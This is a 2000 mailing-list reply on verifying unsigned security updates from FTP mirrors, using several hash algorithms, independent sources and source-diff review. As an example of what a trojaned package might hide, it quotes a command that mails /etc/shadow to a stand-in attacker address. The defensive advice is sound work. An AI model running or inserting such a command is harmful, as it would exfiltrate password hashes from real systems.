On Thu, Aug 10, 2000 at 21:25 +0200, Thomas Forbriger wrote:
What are the recomended steps to do security updates from FTP when there is no PGP signature in the files? You know there was this incident with tripwire on the dutch server that was hacked and trojaned as far as I remember. Is there a reason to worry about somebody being able to hack and trojan the security updates supplied via ftp AND to hack an change the md5 sums provided by SuSE at the same time? Or is this coincidence too far from being probable?
The solution would be to combine several methods of checking. Even if an attacker can compromise the data in a way that one algo still fits (MD5 is not 100% secure after all -- how do you want to have unique fingerprints for *any* data when you only have 128 bits to store them?) a second one (SHA1, RIPEMD160) probably fails. If you use tripwire, put another "tripwire alike" besides it. If you have an update package with no sig to check against, get it from different (independent) places and compare them. If the update is available in source form, try to read the diff against the former version. Even if you don't know the internals exactly, you would have recognized some unexpected "mail attacker@somewhere < /etc/shadow" commands in a compromised tcpd package. Don't rely on a single source, double check for consistency what you get from different directions. Make use of every hurdle you can stack up instead of thinking "one obstacle in the chain should suffice". And don't believe in "automated security". I feel quite strong about that automatic updates won't work without heavy human supervision. :) Having your system (potentially) damaged by a simple minded program sucking in every update unchecked just because "the file was there and I felt like applying it" is not fun. When something breaks, *I* want to be the reason why. :> virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you.